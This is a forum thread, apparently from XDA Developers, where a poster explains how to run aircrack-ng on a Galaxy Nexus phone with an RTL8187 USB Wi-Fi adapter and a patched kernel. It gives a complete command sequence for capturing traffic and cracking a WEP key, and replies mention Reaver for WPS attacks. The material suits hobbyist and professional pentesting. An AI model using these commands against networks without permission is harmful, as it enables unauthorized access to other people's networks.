5,597,397 Members 31,192 Now Online
XDA Developers Android and Mobile Development Forum

[KERNEL] Aircrack-ng on Galaxy Nexus w/ AWUS036H usb wifi adapter (RTL8187 drivers)

Tip us?
 
michaelmotes
Old
(Last edited by michaelmotes; 15th April 2013 at 08:25 PM.) Reason: Added modified kernel module attachment
#1  
michaelmotes's Avatar
Senior Member - OP
Thanks Meter 64
Posts: 113
Join Date: Feb 2012

 
DONATE TO ME
Default [KERNEL] Aircrack-ng on Galaxy Nexus w/ AWUS036H usb wifi adapter (RTL8187 drivers)

For a while now I have been wanting to run aircrack on my galaxy nexus so as to have a mobile pentesting device.

So, I finally got it working and thought I would post how. This is not a task for the terminally challenged.
  1. Install Backtrack 5 ARM. The latter is a linux environment designed for pentesting. On a mobile device the easiest way to install it is by chrooting to the mounted img, running on top of the mobile devices kernel.

  2. Since most people seem to think aircrack is unusable on a mobile arm device, it is not included in the BackTrack 5 linux distro above, so you will need to download it manually once you have BackTrack up and running.

    Here are the commands to do so:
    #!/bin/bash
    # Aircrack-ng installer for BackTrack 5 on Android
    # By Justin Barrick aka th3p4tri0t

    # install dependency for libssl-dev
    apt-get install zlib1g-dev

    # install libssl-dev
    wget http://launchpadlibrarian.net/644124...u8.6_armel.deb
    dpkg --install libssl-dev_0.9.8k-7ubuntu8.6_armel.deb
    rm libssl-dev_0.9.8k-7ubuntu8.6_armel.deb

    # get and install aircrack-ng
    apt-get install source-aircrack-ng
    cd /var/backtrack/sources/aircrack-ng/1.1/bt9/upstream-sources/
    tar -xzf aircrack-ng.tar.gz
    cd aircrack-ng/
    make
    make install

    # set path variable
    echo "export PATH=$PATH:/usr/local/sbin" >> ~/.bashrc
    export PATH=$PATH:/usr/local/sbin

  3. Now, the hard part. Or at least the part that took me forever to discover. You need the drivers for the AWUS036H to be insmod'ed into the kernel. You can accomplish this by obtaining your kernel source and the driver source, which is part of the compat-wireless package, more specifically the AWUS036H uses the rtl8187 chipset. Then, you cross compile those two sources to obtain rtl8187.ko, eeprom_93cx6.ko, and mac80211.ko. Then insmod those kernel modules into your kernel (insmod rtl8187.ko). The process is explained here. One can also recompile the enitre kernel, instead, and include the modules as built-in drivers. However, compiling kernel drivers can be difficult (toolchains, kernel source, etc), so luckily, I found a Galaxy Nexus kernel that already has the modules built-in, it is franco.Kernel R140 with modules added.

    ***Update:farcno.Kernel R200 with RTL8187 modules added, and R248 for JellyBean 4.1.1 with RTL8187 drivers
    , so Aircrack-ng is now compatible with JellyBean! Also, R140 is no longer available but R200 is and has the modules needed


    Beware, the kernel R200 needs ICS 4.0.4 installed to work properly, and R248 is built for JB 4.1.1.

    ***Update 04/11/2013:
    I couldn't find any kernels with the RTL8187 drivers for JB 4.2.2, so, I built one my self. The kernel is a modified franco.Kernel R370. I didn't package it into a flashable zip, because I find it just as easy to hook my phone to my computer and use fastboot (fastboot flash boot bootJB422-RTL8187.img). The kernel image is attached below. I have been running it for about 4 days now without issue. I actually find it is the stablest version yet. I was able to play N64oid, while running airodump-ng and aireplay-ng. File attached below.
    ***Update 04/15/2013:
    I looked into getting more of the aireplay-ng attacks to work proper with the RTL8187 drivers. There had been some complaints about fragementation attack not working and negative one always being returned as the channel for mon0. So, I found two patches for those issues on the aircrack-ng site and applied them to the franco.Kernl r370 with RTL8187 and recompiled. Now, we have fully functional aircrack-ng RTL8187 driver.


    Once you flash the kernel, using the flashable zip and cwm or fastboot flash, then backtrack will be able to recognize the attached wifi adapter.... once you mount the usb bus in BackTrack. And, of course, this needs a OTG USB host cable.

  4. The final step before learning how to use aircrack-ng is:
    1. Open a terminal and load BT5, you can load the 'ui' and use an vnc to connect the the xserver desktop if you want. But, I have found it is easier to just use the chroot shell in the android terminal emulator.
    2. open another android terminal window, and type:
    1. su
    2. mkdir -p /data/local/bt/dev/bus/usb
    3. mount -o bind /dev/bus/usb /data/local/bt/dev/bus/usb
    3. In the new android terminal window, start the BT5 shell (startbt), then type:

    lsusb

    You should see atleast one device, the usb root, and whatever device you have plugged in to the otg cable, if any.

    A note to remember: I re-performed this guide after formatting my phone and got stuck here. lsusb didn't list anything. I rebooted my phone and tried to start BT5 and mount the usb again and it worked. I rebooted, started BT5, tried lsusb without binding usb and was blank as should be, bound usb back in another terminal window, returned to BT5, tried lsusb and root hub displayed.

Now, plug in the AWUS036H and type: airmon-ng
And you should see the device listed.


Read here for how to run aircrack, or view here.

Essentially the commands are:
lshw -disable dmi
(this should list the attached wifi card under NETWORK, my RTL8187 was wlan1)
ifconfig
(you should see wlan1 listed, if not the type "ifconfig wlan1 up" and retype "ifconfig")
airmon-ng start wlan1
airodump-ng mon0

copy BSSID and CHANNEL

New android terminal with BT5 shell (startbt): airodump-ng -w wep -c CHANNEL --bssid BSSID mon0
New android terminal with BT5 shell (startbt): aireplay-ng -1 0 -a BSSID mon0
New android terminal with BT5 shell (startbt): aireplay-ng -3 -b BSSID mon0

After ~50,000 packets collected:
New android terminal with BT5 shell (startbt): aircrack-ng wep-01.cap


To the purpose, with this, if your friend or mom or just some complete stranger forgets their wep key to their network, all they need to do is call you and you can just drive by, plug your wifi adapter into your phone, chroot to BT5 and aircrack their password for them, in a matter of 5 to 10 minutes.


WARNING!!!: In my intial aircrack run on my galaxy nexus, I cracked a wep key in about 5-10 minutes. I was happy, happy, happy. Then, a ruinous moment occurred. Almost the very second aircrack-ng finished cracking the key, my phone came up with a low battery warning, I was using a awus036h wifi adapter and it was draining my battery fast, I had about 50% to begin and had the 14% warning hit me about 10 minutes in, funny thing is the warning is usually 14%, but this time was 13%, go figure? Anyway seconds after the warning my phone just blanks, turns off. I plug it in and reboot and the battery is at 0% and stuck there, so a word of warning:

An external wifi adapter my require more usb host juice then the battery can safely supply. I have seen people using powered hubs to circumvent draining the phone battery, I would defintiely recommend the practice.

UPDATE: I plugged the phone into an AC charger and the battery finally charged (phew). For some reason, it wouldn't recharge on the USB cable after being so drained.
Attached Files
File Type: zip R225-JB.zip - [Click for QR Code] (3.37 MB, 572 views)
File Type: img bootJB422-RTL8187.img - [Click for QR Code] (5.78 MB, 217 views)
File Type: img boot.R370.JB422.RTL8187-aircrack-patched.img - [Click for QR Code] (5.78 MB, 224 views)
The Following 16 Users Say Thank You to michaelmotes For This Useful Post: [ Click to Expand ]
 
auradefect
Old
#2  
auradefect's Avatar
Member
Thanks Meter 7
Posts: 68
Join Date: Aug 2010
Location: Hammond, IN
Is there a compatible wifi device that has the same chip set but with its own power supply (cord or battery)? If so that should help. I'm interested if someone can find one.

Sent from my Galaxy Nexus using xda premium
 
mthe0ry
Old
#3  
Member
Thanks Meter 26
Posts: 79
Join Date: Feb 2011
This is amazing work. I used to do some network pen testing as part of my old job and there's a lot of work that goes into making a mobile setup even with a laptop involved. The fact you got this all working coherently on a phone is mind blowing to me. Huge props.

I have no experience with this manufacturer or ebay seller but through some googling I did find this product:

http://www.ebay.com/itm/Solar-Powere...item20b72a86b6

USB hubs in theory do not identify as normal USB devices and allow for pass through communication between connected devices. This one supplies external power as well. In other words, you may be able to connect both devices to this as it provides external power, and they can communicate without you having to rewrite any drivers.

However, be careful because some USB chipsets get confused if you try to use them as USB host but supply external power at the same time. So you may want to verify that is safe on the GNEX USB chipset.
 
auradefect
Old
#4  
auradefect's Avatar
Member
Thanks Meter 7
Posts: 68
Join Date: Aug 2010
Location: Hammond, IN
Anyone willing to order that hub and test it?

Sent from my Galaxy Nexus using xda premium
 
djxtabay
Old
#5  
djxtabay's Avatar
Member
Thanks Meter 9
Posts: 77
Join Date: Feb 2008
Wow just found that and will be testing it at home tonight.


I flashed the V140 kernel via recovery and I can't locate rtl8187.ko anywhere to move it to /data/local/modules

Where is it located once the kernel flashed?

Thanks!
 
michaelmotes
Old
#6  
michaelmotes's Avatar
Senior Member - OP
Thanks Meter 64
Posts: 113
Join Date: Feb 2012

 
DONATE TO ME
Once you install the R140 kernel mentioned, there is no need to insmod rtl8187.ko. The rtl8187 chipset support is compiled into the kernel boot.img.
The Following User Says Thank You to michaelmotes For This Useful Post: [ Click to Expand ]
 
michaelmotes
Old
(Last edited by michaelmotes; 15th May 2012 at 11:05 PM.)
#7  
michaelmotes's Avatar
Senior Member - OP
Thanks Meter 64
Posts: 113
Join Date: Feb 2012

 
DONATE TO ME
I use this external battery pack, and I spliced a spare USB cord with the cord from my wifi adapter, so it only draws juice from the battery pack.

When you cut open a usb cord there are four wires: red, black, green, and white.
Green and white are data, connect them to the cord going to the galaxy nexus.
Red is +5V, connect it to the +5 V or red cord going to the battery pack.
Black is common, connect it to both usb cords.
So, on the cord going to the battery pack, green and white are loose, and on the cord going to the gnex, red is loose.

Or, you could use the solar powered hub mentioned above. You will still need the modified kernel, as the hub will show up as an attached device, but so will whatever is connected to it. You can't communicate with a device, without the appropriate drivers.
The Following User Says Thank You to michaelmotes For This Useful Post: [ Click to Expand ]
 
bigrushdog
Old
#8  
bigrushdog's Avatar
Recognized Developer
Thanks Meter 5799
Posts: 3,031
Join Date: Apr 2007
Location: Fontana, CA

 
DONATE TO ME
I did the bt5 development for the xoom. Reaver works too for h4xRing wps. I make a module pack with about 100 modules for xoom. If this is something the gnex community is interested in ill see what a can do.
The Following 3 Users Say Thank You to bigrushdog For This Useful Post: [ Click to Expand ]
 
michaelmotes
Old
#9  
michaelmotes's Avatar
Senior Member - OP
Thanks Meter 64
Posts: 113
Join Date: Feb 2012

 
DONATE TO ME
bigrushdog, to be honest, during my trek to get this working, I nearly gave up and bought a XOOM, after seeing how well developed it was.
 
djxtabay
Old
#10  
djxtabay's Avatar
Member
Thanks Meter 9
Posts: 77
Join Date: Feb 2008
Quote:
Originally Posted by bigrushdog View Post
I did the bt5 development for the xoom. Reaver works too for h4xRing wps. I make a module pack with about 100 modules for xoom. If this is something the gnex community is interested in ill see what a can do.
Of course I would be interested!!!

The Following User Says Thank You to djxtabay For This Useful Post: [ Click to Expand ]
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes